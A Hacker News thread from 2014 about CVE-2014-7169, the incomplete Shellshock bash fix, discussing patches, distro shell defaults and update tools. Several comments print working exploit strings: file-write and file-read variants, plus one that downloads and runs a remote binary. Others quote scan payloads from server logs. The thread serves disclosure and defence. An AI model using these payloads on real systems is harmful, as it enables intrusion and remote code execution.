Hacker News new | past | comments | ask | show | jobs | submit login
CVE-2014-7169: Bash Fix Incomplete, Still Exploitable (seclists.org)
557 points by caust1c on Sept 25, 2014 | hide | past | favorite | 210 comments



Proposed patch for CVE-2014-7169 here:

http://www.openwall.com/lists/oss-security/2014/09/25/10

I am building bash updates for Ubuntu containing the proposed fix here and will publish them once the fix has been made official:

https://launchpad.net/~ubuntu-security-proposed/+archive/ubu...


I'm wondering if it wouldn't be possible to still support "export -f" while making it harder for attackers to fake it out. For example, if "export -f foo" put the function body in an environment variable named "BASH_EXPORTED_FUNC_foo", instead of just "foo", then the next bash, on startup, wouldn't have to even attempt function-body parsing on environment variables which lack that prefix, including a lot of the currently trumpeted attack vectors (SSL_whatever, HTTP_whatever, TERM, SSH_ORIGINAL_COMMAND, etc.)

This wouldn't be complete mitigation, and isn't a substitute for the current patches, but it could possibly reduce the attack surface for exploit of any similar remaining problems.

(I can imagine that someone, somewhere, as added an "export -f" env var to an AcceptEnv whitelist, or some such thing, and would need to change it, but that's probably a very rare situation.)

(Edited for clarity.)


For anyone landing here, mdeslaur and the Ubuntu team has now released a patch for CVE-2014-7169.

http://www.ubuntu.com/usn/usn-2363-1/


Debian stable is out as well.


Possibly stupid question, but won't Ubuntu also publish these as soon as the fix is made available as well?


mdeslaur is an Ubuntu security engineer.


Ahah, okay, makes sense. Thanks!

And THANK YOU SO MUCH for all your amazing work on this stuff, mdeslaur!


If you're following the instructions here: http://apple.stackexchange.com/questions/146849/how-do-i-rec...

...then this patch needs to be modified (different line numbers) before it can be applied to the Apple version of bash:

    --- parse.y.old 2014-09-25 13:42:17.000000000 +0300
    +++ parse.y    2014-09-25 13:41:39.000000000 +0300
    @@ -2503,6 +2503,8 @@
       FREE (word_desc_to_read);
       word_desc_to_read = (WORD_DESC *)NULL;
    
    +  eol_ungetc_lookahead = 0;
    +
       last_read_token = '\n';
       token_to_read = '\n';
     }
Testing locally, this appears to mitigate both known (so far) vulnerabilities.


Steps to get the partial patch on ubuntu:

  sudo add-apt-repository ppa:ubuntu-security-proposed/ppa
  sudo apt-get update
  sudo apt-get upgrade
unattended auto upgrades from that PPA:

  sudo apt-get install unattended-upgrades
  dpkg-reconfigure unattended-upgrades
then go to /etc/apt/apt.conf.d/50unattended-upgrades and add a line to allowed-origins that looks like

  "LP-PPA-ubuntu-security-proposed:precise"
Also make sure distro-codename-security is uncommented, and comment out the -updates one if you want. Then do this to make sure it all works:

  sudo unattended-upgrades --dry-run --debug


With the patched bash, if you run

    env X='() { (a)=>\' sh -c "echo date"
This is equivalent to running

    date >echo
That is, you can put something in the environment which causes it to drop the first token, run the result as a command, and redirect the result to the dropped first token.

An example of a context where this would be exploitable, is a CGI webapp which accepts an uploaded zip file, stores it in a FAT filesystem, and and runs system("unzip /path/to/file"). Then putting a corrupt string in a header would cause the file to be executed, rather than unzipped.


Just as an aside - is there a particular reason you specify the type of the filesystem? Is there something specific to FAT that might make this exploit viable? I'm thinking permissions, but I'm not sure.


I think it's that all files have mode 0777, i.e. executable by default. I think it can be changed with mount options though.


Thanks a lot, I was discussing this with a friend and we reached this conclusion too.


You don't even need FAT if the CGI script doesn't properly escape spaces in filenames. e.g.:

    env X='() { (a)=>\' sh -c "unzip wget -O /tmp/hax 8.8.8.8:hax; chmod 777 /tmp/hax; /tmp/hax"
(the "filename" here being "wget -O /tmp/hax 8.8.8.8:hax; chmod 777 /tmp/hax; /tmp/hax")


This assumes that system() is calling bash, but it usually calls /bin/sh, which is often linked to something other than bash (for example, dash is used on recent Ubuntu and Debian installs).


Not always, this is on Slackware 14.1:

    $ ls -l /bin/sh 
    lrwxrwxrwx 1 _ _ 4 Apr  3 18:13 /bin/sh -> bash*


All my Ubuntu 14.04 systems have /bin/sh symlinked to bash, not dash. I'm seeing articles on the net about Ubuntu switching to dash, but as far as I can tell, it either was reverted, or never happened.


That's weird:

    $ lsb_release -a
    No LSB modules are available.
    Distributor ID:	Ubuntu
    Description:	Ubuntu 14.04.1 LTS
    Release:	14.04
    Codename:	trusty
    $ ls -l /bin/sh
    lrwxrwxrwx 1 root root 4 Feb 19  2014 /bin/sh -> dash


Hum. Strange. I just tested with clean Ubuntu EC2 instances, and they are indeed symlinking /bin/sh to dash.

Either I have a part of my standard stack that reverts it to bash (but I have no idea what could be doing that), or it could be my provider (OVH) doing that by default when they install Ubuntu.

Oh well, sorry for the noise.


I spun up an EC2 ubuntu 14.04 instance a few minutes ago - a quick check shows sh -> dash.

Are your systems fresh installs or dist-upgrades from older systems? I wonder if there's a difference there somehow. Or perhaps your puppet/chef/etc rules are changing to bash?


Ubuntu symlinks /bin/sh to /bin/dash by default as of some ancient version. This is pretty annoying and I often end up manually undoing it and linking it to /bin/bash when a script fails in spectacular ways (dash doesn't support some bash-specific niceties). It's merely a fortunate accident for Ubuntu that this type of bug was discovered in bash, not dash.


So those shell scripts use bashisms but don't use #!/bin/bash and instead have #!/bin/sh ?


The problematic scripts don't have a shebang at all, as you can likely guess. Would it be easier to add a shebang? If the one script was the only problem, yes, but I just see no compelling reason to leave my Ubuntu environments in an inconsistent state and risk experiencing other unusual behaviors. I'd rather my Ubuntu boxes behave in a similar fashion to all the other Linux environments I use, which all link /bin/sh to /bin/bash.

The justification I've found when I looked up what was going on here was "dash makes boot times faster". That's fine, but I don't reboot my systems very often and fractional increases in boot times are not worth the potential work-time disruption to me.

None of that changes the fundamental fact here: these types of security bugs could happen in any low-level, system-fundamental project like a shell. Even if you say, "Nuh-uh, I would never evaluate functions out of environment variables if I was writing a shell", I guarantee there are other things you can mess up that would present serious security risks. It is just by dumb luck that bash is the culprit this time and not some other software, and that Ubuntu happens to link /bin/sh to a shell that doesn't have the same specific bug (because it lacks the feature that provides the attack surface).


Yes but fixing that is a simple matter of replacing sh with /bin/bash.


You can only do that if you already have shell access (in which case the vulnerability gives you nothing). The remote exploit works because untrusted users can put code into an environment variable, but the target needs to create a new bash to execute the code.


Hm.

On one hand, this is pretty specific and not "run into the woods" dangerous.

On the other hand, it's also not that unrealistic.

Also, I am kind of afraid there will be more stuff lurking in there.


It's almost like the shell was designed to execute arbitrary commands!


All this "echo date, cat echo" business is confusing.

Let me fix that for you.

    hobbes@metalbaby:~$ export badvar='() { (a)=>\'
    hobbes@metalbaby:~$ bash -c "somestring executeMe"
    bash: badvar: line 1: syntax error near unexpected token `='
    bash: badvar: line 1: `'
    bash: error importing function definition for `badvar'
    bash: executeMe: command not found
    hobbes@metalbaby:~$ cat somestring  #it exists but is empty.
    hobbes@metalbaby:~$ bash -c "somestring date"
    bash: badvar: line 1: syntax error near unexpected token `='
    bash: badvar: line 1: `'
    bash: error importing function definition for `badvar'
    hobbes@metalbaby:~$ cat somestring 
    Thu Sep 25 11:01:35 CDT 2014
    hobbes@metalbaby:~$ bash -c "somestring echo hello"
    bash: badvar: line 1: syntax error near unexpected token `='
    bash: badvar: line 1: `'
    bash: error importing function definition for `badvar'
    hobbes@metalbaby:~$ cat somestring 
    hello
Gititgotitgood? Great. Now how the heck does anybody think that is as bad as the first one?

For this one, an attacker needs to control both the environment AND the command line of the child shell.

People, if those criteria are met, the attacker wins, with or without bugs.

Yes, yes, there are situations where the attacker has partial control of the command line via a filename argument or whatever--whatever indeed! That's not even in the same category as the first bug.


Don't think "how can an attacker get me by prepending '>' or '<' to a commandline?" (You did realize that '<' is also possible, right? Did you check what else is possible?)

Think "the buggy bash parser is still exposed to an attacker, and nobody really knows what it can be made to do."


Yeah, I hear you.

Well let's see...

All of these work for me (bash 4.3 including yesterday's patches on Debian sid amd64):

    hobbes@metalbaby:~$ unset badvar; rm somefile; export badvar='() { (a)=>\'; bash -c "somefile echo tricksie"; cat somefile 
    hobbes@metalbaby:~$ unset badvar; rm somefile; export badvar='() { (b)=>\'; bash -c "somefile echo tricksie"; cat somefile 
    hobbes@metalbaby:~$ unset badvar; rm somefile; export badvar='() { (gooooooaaaal)=>\'; bash -c "somefile echo tricksie"; cat somefile 
    hobbes@metalbaby:~$ unset badvar; rm somefile; export badvar='() { (a).>\'; bash -c "somefile echo tricksie"; cat somefile 
    hobbes@metalbaby:~$ unset badvar; rm somefile; export badvar='() { (a)[>\'; bash -c "somefile echo tricksie"; cat somefile 
    hobbes@metalbaby:~$ unset badvar; rm somefile; export badvar='() { (a)=>\'; bash -c "somefile echo tricksie"; cat somefile 
    hobbes@metalbaby:~$ unset badvar; echo tricksie > inputfile; export badvar='() { (a)=<\'; bash -c "inputfile cat";


As a followup, someone finally did find a full-blown 'execute whatever you like' exploit for the patched version of bash.

http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-...


The way I see it a sane but unfortunate programmer can cause a CVE, but you have to be insane to do what bash does with its environment. Why the HELL doesn't bash store inherited functions in an environment variable with a known name (e.g. "BASH_INHERITED_FUNCTIONS") like everybody else?!?

In my mind even this trivial example is a bug (albeit less serious from a security perspective):

  $ env VAR="() { This is how I like my VAR } ()" /bin/sh -c 'echo $VAR'
  /bin/sh: VAR: line 0: syntax error near unexpected token `('
  /bin/sh: VAR: line 0: `VAR () { This is how I like my VAR } ()'
  /bin/sh: error importing function definition for `VAR'
  
  $
Imagine an ABI that works like that: you can pass any string, as long as it doesn't start with "() {"... :/


export badvar='() { (a)=>\';bash -c "hackerfile echo vulnerable";grep vulnerable hackerfile||echo safe


Earlier on a mailing list someone pointed out that there is still an awful lot of string processing going on by bash even after this afternoon's fix. So further bugs were likely to be found now that everyone is constantly sniffing around the place.


That was one of my first thoughts as well. There is way too much code that's being exposed here. This will be a gift that keeps on giving.

For people who want to do environment sanitation, do we know what values can trigger this 'feature'? Is it only "()" as the first two characters? First two non-whitespace characters?


Answering my own question, since I got curious enough to look a the source:

    if (privmode == 0 && read_but_dont_execute == 0 && STREQN ("() {", string, 4))
So it has to start with that four character sequence exactly.

I hope there are patches to webservers, sshd, etc to cleanse environment variables with that value. Even if bash is fixed, it is too risky to send untrusted strings to its parser.


Sudo already has a feature like this.

            /* Skip variables with values beginning with () (bash functions) */
            if ((cp = strchr(*ep, '=')) != NULL) {
                if (strncmp(cp, "=() ", 3) == 0)
                    continue;
            }


You are describing blacklisting known bad values.

()&#32;{

()+{

Would those make it through? I don't know, neither does the person writing the WAF.


Can someone explain why bash is evaluating and looking for function definitions in every environment variable? What would be broken if this entire "feature", whatever it is, was completely disabled?

That's almost like a C compiler looking for C programs in string literals. It just doesn't make sense to me.


It's so you can export a function into child shells:

http://stackoverflow.com/questions/1885871/exporting-a-funct...

Hardly worth the security cost in retrospect, but some bash scripts will surely break if it were just ripped out.


Seems like something that should be turned off by default and enabled when desired/needed.


I was thinking the same thing – if there ever was a case for a "bash --allow-terribly-insecure-features" flag this is it.


Don't use bash as a system or scripting shell then - thats exactly why dash, or the BSD shells exist. Exporting functions makes no real sense anyway, at least if you did it by hand it would be obvious how dangerous it is.


From reading one of the threads I think I get it. It allows you to "export" functions (export -f). I guess that's passed via the environment, so process start scans for them.

The issue is that it was evaluating the whole variable to get them into your process. So if you have "garbage" at the end it's interpreted as the next command following the function definition.


What tools are people using to track and push out security updates, if any? Right now I only have a few servers to administer so apticron is sufficient for notification and upgrading isn't a burden.

Also, does anyone have a way to push out patched packages fast? Imagine that a patch is available, or it's trivial to remove a feature that you're not using, but the distribution hasn't made a package yet. I have been dreaming of making a system to help debian users create and manage a local set of packages, but haven't really had a chance to take it to a point where it'd be helpful in this scenario.

My extended thoughts on the matter: http://stevenjewel.com/2013/10/hacking-open-source/


On Debian or Ubuntu, install the unattended-upgrades package. Configure it to install security updates only.

> ...but the distribution hasn't made a package yet.

On Ubuntu, I think you can probably set up a Launchpad PPA and then configure unattended-upgrades to automatically pull from it. Then just push what you need to that PPA when you're ready.

If you want to host the repository elsewhere, then that's possible too, but you probably want to start with a PPA since you don't have to worry about build and publishing infrastructure to start off with.


For anyone who doesn't know, there's also a similar "yum-updatesd" for RHEL and derivatives like CentOS, though it only gives notifications of updates IIRC.


Since I'm an Ubuntu user, I use Landscape to keep my system up-to-date: https://landscape.canonical.com/

It did the patching for me during the night (I told it to do so for security updates), so I woke up to already patched systems.

Full disclaimer: I work for Canonical.


I have no interest in paying for Ubuntu Advantage. I would happily pay a reasonable amount for just Landscape, but Canonical doesn't offer that. Get your sales guys to fix that, and you'll end up with a lot more Landscape users. Or better yet, just open source Landscape.


I would also be interested in a landscape only package at a reasonable price.


+1. Landscape has gotten zero serious evaluation at our company completely because of their heavy-handed pricing arrangement.


I seem to have woken up to a patched system too, i.e.

    Start-Date: 2014-09-25  06:53:13
    Upgrade: libnss3-1d:amd64 (3.17-0ubuntu0.14.04.1, 3.17.1- 0ubuntu0.14.04.1), libnss3-nssdb:amd64 (3.17-0ubuntu0.14.04.1, 3.17.1-0ubuntu0.14.04.1), bash:amd64 (4.3-7ubuntu1, 4.3-7ubuntu1.1), libnss3:amd64 (3.17-0ubuntu0.14.04.1, 3.17.1-0ubuntu0.14.04.1)
I am an happy ubuntu user, but I think in this case "unattended-upgrade" might have been enough?


How much does Landscape cost? I honestly can't figure it out.

The only thing I saw was ~$300 per server... most of my servers didn't cost anywhere near $300...


You can't buy Landscape directly, sadly... You have to pay for Ubuntu Advantage, which is their support offering, which is why it's a ridiculous $$$ per server.


When Landscape would be cheaper I would try to using it aswell, but since it's not I'm using ansible.


Shameless plug as the owner: https://sysward.com/ - this is one of the reasons I built this - there is even a package view so you can apply just this package update across your systems. Message me if you have any questions!


I have a security warning from Chrome on my phone as of now. Maybe you want to look into that!



No warnings about SSL on iPhone Safari. Are you on Android?

(Disclaimer: not affiliated with Sysward)


Thanks for the heads up - I'll take a look!


If you use one of several popular cheap SSL providers, you need to add some intermediate certs to your server's SSL store or Android will show those warnings. It's pretty lame.

https://knowledge.rapidssl.com/support/ssl-certificate-suppo...


I typically use the CVE RSS feeds http://nvd.nist.gov/download/nvd-rss.xml and plug them into an IRC bot.


Great idea. Setup IFTTT to do the same to a Slack channel: https://ifttt.com/recipes/206224-post-nvd-vulnerability-noti...


Doesn't slack have it's own RSS bot? Why not use that?


Ah cool didn't know Slack had RSS integration.


Plug: While we don't support alerts of security incidents, you can use https://commando.io to easily execute yum -y update bash or apt-get upgrade -y bash on groups of servers. We also integrate with DigitalOcean, AWS, and Rackspace.

See the following tweet: https://twitter.com/alexandermensa/status/514811145887027201


Using salt to push out updates, easy and fast. "salt * pkg.install bash refresh=True"


Am I reading this right? If a string starts with the characters '() {', it is handled differently by the interpreter?

What am I meant to do if I actually want to store the characters '() {' in a string?


Welp, I'm about to take a hammer to all of my data centers and get busy, then move deep into the woods. Good luck to everybody else who decides to leave their equipment functioning; it was nice knowing you.


Reproduced from my comment on the discussion of the previous CVE

The same trick can be used to read files as well

  $ date -u > file1
  $ env -i X='() { (a)=<\' bash -c 'file1 cat'
  bash: X: line 1: syntax error near unexpected token `='
  bash: X: line 1: `'
  bash: error importing function definition for `X'
  Thu Sep 25 02:14:30 UTC 2014 
Though obviously it's going to be trickier to find an system that issues commands in a way that can act as a path for that sort of exploit.


[deleted]


I think you screwed up your test, I have not managed to get it to work with the LD_PRELOAD workaround installed.


The reponse from ubuntu 14.04

user@user:~/ X X: user not authorized to run the X server, aborting.


I guess you are running remotely or you didn't use sudo!


Does anyone know what Apples policy on fixing this might be? I understand why they ship with an older version of bash and other GNU userspace tools but is there a precedent they've set for backporting?


They won't have to backport the fix, there is a patch directly against bash-3.2 (which ships in OSX): http://ftp.gnu.org/pub/gnu/bash/bash-3.2-patches/bash32-052

They do update bash occasionally, even though it is trapped forever in a pre-GPLv3 world: http://www.opensource.apple.com/source/bash/. For instance, bash-86.1 shipped in 10.8 and bash-92 shipped in 10.9.

I don't know if they will hop right on this (and personally I find the issue overblown), but I imagine it will get patched at some point.


OS/X does use bash as /bin/sh unfortunately so it is fairly vulnerable. Probably most people won't be affected though since there aren't many good attack vectors against a client machine, and not many people are still using macs for servers.

I don't think that the issue is overblown at all though. CGI is old and crusty but it's sitting in all sorts of random places. All you need to do is to find a script that will call system()/popen()/etc and it's game over. Plus those are just the sorts of forgotten environments that people won't remember to patch. I'm sure there will be thousands of exploitations in the next couple days. This is a big deal.


bash on OSX is vulnerable, but as you say, there are few attack vectors. A client OSX machine with a stock config is not vulnerable. At a minimum, you have to enable a network service like printer sharing (CUPS), remote login (ssh), web sharing (Apache).

Then you have to configure the service in such a way to actually be vulnerable, and these are not commonly configured options.

The attacker also has to have a local privilege escalation vulnerability to exploit as well, or they're trapped as the CUPS user once they do bust in.

I don't think that the level of panic I have seen on other Hacker News threads and elsewhere on the Internet is warranted. Comparing this to Heartbleed is pretty absurd; TLS vs bash CGI is no contest in terms of deployment size.

I'm mainly concerned with public-facing, large scale web services, and in that area:

1. CGI in general and bash CGI in particular are basically unheard of.

2. system() in other scripting languages might be used, BUT to be vulnerable you have to pass through user-supplied data as environment variables without sanitizing. This was always an exploit waiting to happen.

3. ssh accounts with a command forced in authorized_keys are potentially problematic, but this would only be from users who have some relationship to your service in the first place. Personally I think a restricted shell (rsh or git-shell or whatever) is a more common option, simply because who knows what bash might get up to.

4. DHCP client scripts on Linux is an interesting exploit path, and might be a problem for laptops on shared wifi, but for the majority of Linux servers there is no attack vector. They live on controlled networks where rogue DHCP servers can't be operated.

So yes, patch the vulnerability and audit your systems and code. Also keep the response proportional to the vulnerability, this one needs a lot of other things to fall into place to be exploited.


I generally agree with this, but I do have a few nitpicks.

> Comparing this to Heartbleed is pretty absurd

They're such different bugs that they're hard to compare. Heartbleed definitely affected more high-value targets, however the exploit just gave you some RAM contents. It would still be some manual work to figure out what those values meant (whcih bits are ssh keys, which are passwords, ...) and leverage them. Shellshock is much better suited for a "sweep all of IPv4, build a botnet" scriptkiddie attack.

> bash CGI in particular are basically unheard of

The CGI doesn't have to be written in bash, it just has to call something that calls something that ends up calling system()/popen()/whatever. There are probably lots of such cases. Once httpd puts the poisonous string in your environment it's going to be passed down to all of your subprocesses. If you're using CGI at all on a machine with /bin/sh==bash you should assume you're vulnerable.

> They live on controlled networks where rogue DHCP servers can't be operated.

If you're on a network with nodes you don't trust (public wifi, large corporate networks, etc) there is a risk that machines other than the router will reply to broadcast DHCP requests. I don't know the full scope of this attack vector yet but I wouldn't be blasé about it.


> They're such different bugs that they're hard to compare.

I mentioned it because people are having a field day comparing the two (which results in some good old fashioned fear mongering). A random sampling:

  CNet: ​'Bigger than Heartbleed'
  Gizmodo: Why the Bash Shellshock Bug Could Be Even Worse Than Heartbleed
  Mashable: Shellshock: The 'Bash Bug' That Could Be Worse Than Heartbleed
  The Independent: Shellshock: Bash bug 'bigger than Heartbleed' could undermine security of millions of websites
  Errata Security: Bash bug as big as Heartbleed
> The CGI doesn't have to be written in bash

This was covered in my second item, about using system(). I'm certain that there is software out there that does this, but it is in no way common or has ever been best practice.

The panic over this presumes that people use CGI all the time. It's awful, it's always been awful, and should never be used for anything public facing for lots of other reasons. Note that FastCGI is not impacted.

> If you're on a network with nodes you don't trust

Correct, but this isn't the case for most (but not all) server deployments. In your own datacenter environment, you control the network and all of the hosts on it -- if someone busts in to run a DHCP server, you have bigger fish to fry.


I'm starting to see automated attack attempts using HTTP_HOST headers set to '() {'.


Are you seeing any from IP addresses besides 209.126.230.72, which is Robert Graham scanning the Internet[1]?

[1] http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-in...


The Metasploit folks released their exploit not too long ago. I haven't had any hits monitoring my Apache logs all day until just recently. Good luck/god bless to everybody.


I am seeing:

  web22 ~> grep "() {" logs/access_log
  209.126.230.72 - - [24/Sep/2014:17:16:46 -0700] "GET / HTTP/1.0" 200 5733 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)" 13378 () { :; }; ping -c 23 209.126.230.74 80 74529


Thanks for that command btw; I got scanned by erratasec :D

    209.126.230.72 - - [24/Sep/2014:23:13:20 +0200] "GET / HTTP/1.0" 200 29301 "() { :; }; ping -c 11 216.75.60.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
    209.126.230.72 - - [25/Sep/2014:08:45:00 +0200] "GET / HTTP/1.0" 200 29292 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"


very interesting one: 89.207.135.125 - - * () { :;}; /bin/ping -c 1 198.101.206.138"


Yes, I had that one too, also this:

    24.251.197.244 - - [25/Sep/2014:10:07:47 +0000] "GET / HTTP/1.1" 301 178 "-" "() { :; }; echo -e \x22Content-Type: text/plain\x5Cn\x22; echo qQQQQQq"


Yes, I got that too.

>89.207.135.125 - - - "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 302 483 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"

...searching for vulnerable CPanel installs.


Ive seen 89....125 as well, bastard.

Lets all ping 198...138!


I got mine!

    access.log.1:209.126.230.72 - - [25/Sep/2014:02:14:12 +0000]
    "GET / HTTP/1.0" 502 172 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"


My logs show 3 scans of this so far.


RHEL made a C shared object available that you can preload in everything which cleans up the environment of the magic "() {" bit : https://access.redhat.com/articles/1200223 (and apparently exactly that sequence has magic meaning; "( ) {" does not work )

For CGI scripts, only putting it in /etc/ld.so.preload worked for me. It seems like the CGI environment has LD_PRELOAD stripped (I checked /proc/apache_pid/environ which has LD_PRELOAD, but the CGI script running does not).


Is this an alternative to the bash upgrade or is this needed to fix the issue after the bash upgrade (because of an incomplete patch)?


It's a workaround that should be used if you must mitigate the issue right at this moment. Applying the update, once it's available, should do the same thing. Note that the workaround might have some unintended consequences as mentioned in the FAQ section of [1].

[1] https://access.redhat.com/articles/1200223


It looks like the important part of the patch (bash43-025) is here:

In builtins/evalstring.c:

    if ((flags & SEVAL_FUNCDEF) && command->type != cm_function_def)

In variables.c:

    parse_and_execute (temp_string, name, SEVAL_NONINT|SEVAL_NOHIST|SEVAL_FUNCDEF|SEVAL_ONECMD);
So what the patch does is create a special mode of parse_and_execute() where it's supposed to only evaluate function definitions. A better option would be to add a flag to parse_and_execute() that disables it from attempting any execution completely, not just function definitions.


Wouldn't that break the feature? Function definitions need to be executed so that they are available, right?


By "execution" I meant the execution of arbitrary code, either shell builtins or other programs, the original point of this vulnerability. Function definitions should really be thought of as being evaluated to make them available for future use.


The exploit worked against my cgi perl scripts as well!

I had cgi-bin/update.pl running on OS X and I exploited it as mentioned here: https://twitter.com/hernano/status/514866681530023936

My perl scripts call $out = `git pull`, log to a file, and print a response; I was quite surprised the exploit worked against them. Promptly disabled, upgraded bash, and re-enabled, now disabling all cgi for a bit longer.

What are the common vectors beyond CGI-space for the average server? How do we find and test them?


Yes, this exploit can be used on any script or program that uses system(), whatever language you use.

Using bash as the default /bin/sh is the real bug here.


"Yes, this exploit can be used on any script or program that uses system(), whatever language you use."

Unless that script or program sanitizes the environment before calling system(). In practice that might not presently be any scripts or programs, but it principle it's a tiny bit weaker than you say.


Not sure if it helps against this vulnerability, but using Git::Wrapper [1] makes for much nicer code than backticks.

[1] https://metacpan.org/pod/Git::Wrapper


Awesome, thanks. Seems like it would've.


Perl backticks and system() delegate commands to the system shell, normally sh. On many systems, sh is simply bash in compatibility mode. That's how the attacker gets at the vulnerability.


Nice that "compatibility mode" does not bother to disable this technically non compatible behaviour...


Thanks. Suspected as much, but still a bit petrified that the shell var/func passed through perl to the backtick-shell.


system() delegates to shell only in the case of one argument given to system().


OK - so assuming that there isn't going to be a single patch which fixes all possible / related bugs any time soon.

Options?

- Change /bin/sh to something else. (CentOS has BASH as default, alas...) - Filter out unknown, or suspicious looking HTTP vars / env vars at varnish/apache/nginx level, somehow... (doesn't stop other services) - Figure out some clever SELinux configuration that blocks it.

I wonder how much would fail on switching out BASH as default sh?


I just followed the following instructions on Arch for replacing bash with dash:

https://wiki.archlinux.org/index.php/Dash

The technique is applicable to other distributions as well.

Note: on my Arch install the checks showed there were no scripts relying on /bin/sh being bash.

Edit: direct link to checkbashisms.pl - http://anonscm.debian.org/cgit/collab-maint/devscripts.git/p...


You want to actually remove bash god forbid something calls /bin/bash directly instead of using the /bin/sh link.


Ubuntu 10.04LTS has dash as the default shell, as does Debian Squeeze (oldstable).


The default /bin/sh, but NOT the default login shell. Those are two very different things.


I wonder how much would fail on switching out BASH as default sh?

Ubuntu did that years ago, to speed up booting.


Yes, and in doing so they (well, Debian) upstreamed a lot of fixes for bashisms, so most system stuff is ok.

Apparently a lot of node.js stuff uses #!/bin/bash explicitly in scripts, so removing bash entirely might be difficult if you use node, or otehr stuff.


A little off topic, but am I still vulnerable?

I'm running OSX mavericks 10.9.5, use zsh as my default shell, and have a patched version of bash build from homebrew repo set as secondary in /etc/shells (on the occasion I need bash, I like to have completions). System bash is still vulnerable. With my current configuration, how worried should I be?

Any insight is appreciated!


Yes, you are still vulnerable. I happen to be on Mountain Lion instead of Mavericks, but you can easily check yourself.

  $ /bin/sh --version
  GNU bash, version 3.2.48(1)-release (x86_64-apple-darwin12)
  Copyright (C) 2007 Free Software Foundation, Inc.
As long as you have a /bin/sh or /bin/bash that is of a vulnerable version, then any shell script which begins with #!/bin/sh or #!/bin/bash, and is executed in an environment that could have environment variables set by an attacker, could leave you vulnerable.

Installing a version via homebrew and setting it up in /etc/shells doesn't help. What you need to do is replace /bin/sh and /bin/bash. I don't know what effects this will have; it will likely work fine, but if you were to try it, I'd recommend backing up the old buggy versions first, so you could replace them if something went wrong. I'd recommend replacing them with a version as close as possible to what you were replacing, with just the one patch applied, as there may be scripts which behave subtly differently in Bash 4 vs Bash 3 that ships with OS X.


I went ahead and recompiled a patched version of system bash as described in this SE thread: https://apple.stackexchange.com/questions/146849/how-do-i-re.... Thanks!


I'm not completely sure, but from what I understand unless you have some cgi shell scripts on a webserver running on your machine (or another way for someone to invoke bash with custom environment vars) I think you're fine.



I found some exploitprobes from a server called datacards.org. Happend on a server located in germany. Its some kind of personal data gathering system (National Defense University DataCards)

http://home.comcast.net/~dshartley3/DIMEPMESIIGroup/Data.htm http://discussions.sisostds.org/threadview.aspx?threadid=533...

Should be limited to Afganistan and stuff


OK two questions:

1. Does zsh (or other shells) also have these kind of string processings where bugs are likely?

2. Is there a way to completely remove bash from the system and use zsh (or other shells) instead?


1. This exact bug, I dunno? From what I know about zsh, no, but what I don't know about zsh can fill books. But general string bugs? Probably. String processing is hard.

2. Possible yes, practical no (for most folks). Almost everybody's got a bunch of scripts with `#! /bin/bash` or `#! /usr/bin/env bash` lying around. Good luck excising everything that automatically assumes it's the shell of choice.


`ln -s /bin/zsh /bin/bash`?


Which would instantly break any script which uses bashisms.


It really depends on the *nix you are running.

FreeBSD, for example, only had bash as a port and it is not in the base install -- I believe `/bin/sh` is a derivative of ash[1].

[1]: http://en.wikipedia.org/wiki/Almquist_shell


I never really considered the importance of that. It always seemed like some weird crotchety UNIX thing to default to /bin/sh, and usually my first 30 minutes on a FreeBSD box are portsnapping, cd /usr/ports/shells/bash, and a make install clean.

Now I get it


The other reason is that bash has dependencies outside the core system and is therefore possible to totally break on FreeBSD. Never change root's shell to bash!


Debian also has a minimalist /bin/sh (via dash), but unlike FreeBSD they do ship bash in the base install, as the default interactive shell. Which is the default interactive shell doesn't matter much, since interactive shell usage isn't the likely vector of this exploit. However some Debian packages may explicitly call bash (rather than /bin/sh), since they can assume it's in the base install, while we know for sure no base FreeBSD packages do. I'm not sure whether anyone's done a survey yet of which Debian packages shell out to bash vs. dash vs. nothing.


I think Android uses mksh[1] these days too.

[1]: http://www.all-things-android.com/content/mirbsd-korn-shell-...


All software with more than a few lines of code contains bugs. Zsh doesn't support the misfeature of exported functions so is not vulnerable to this issue.


I've been trying to exploit our own systems which have PHP web frontends running under apache/mod_php, and in my testing PHP isn't passing through any HTTP_* environment variables at all in calls to system() or exec().

Even just echoing back the result of "env" it doesn't look like I get anything user-supplied whatsoever in there (no HTTP_*)

Can anyone more knowledgable confirm what I've seen?


CGI is affected. When using mod_php, the request headers aren't passed via environment.


Another PoC:

env -i X='() { (a)=>\' bash -c 'echo curl -s https://bugzilla.redhat.com/'; head echo

Creates file called echo and outputs the contents using head.

(from https://bugzilla.redhat.com/show_bug.cgi?id=1141597#c24)


[deleted]


You might want to make sure the symlink is really in effect -- try temporarily deleting bash or making is non-executable:

# chmod -x `which bash`


Appears to work, even with latest patches, by using sh (from the link):

  $ env X='() { (a)=>\' sh -c "echo date"; cat echo
  date
  Wed Sep 24 15:00:34 PDT 2014

  -- previous bug fix for bash (before/after patch) --

  $ x='() { :;}; echo vulnerable' bash -c 'echo test'
  vulnerable
  test

  $ x='() { :;}; echo vulnerable' bash -c 'echo test'
  bash: warning: x: ignoring function definition attempt
  bash: error importing function definition for `x'
  test
Tested on Ubuntu 14.04.1 LTS & Debian GNU/Linux 7.0 (wheezy) with latest patches.

ps. lots of chatter about the original issue @ https://news.ycombinator.com/item?id=8361574


I don't think either you or the author are correct.

    hobbes@media:~$ env X='() { (a)=>\' sh -c "echo date"; cat echo
    date
    cat: echo: No such file or directory
    hobbes@media:~$ uname -a
    Linux media 3.13-1-686-pae #1 SMP Debian 3.13.5-1
    hobbes@media:~$ echo $BASH_VERSION
    4.3.25(1)-release
It looks to me like we're setting X in the environment, calling `sh -c "echo date"`, passing that X in to it, nothing happens, then we're cat'ing a file named echo, which does not get created in the first place, at least not on my machine.

I played with the original test a bit. You can break it into two lines to see what is happening. For example:

    1. hobbes@media:~$ export badvar='() { :;}; echo vulnerable'
    2. hobbes@media:~$ bash -c "echo I am an innocent sub process in '$BASH_VERSION'"
    3. bash: warning: badvar: ignoring function definition attempt
    4. bash: error importing function definition for `badvar'
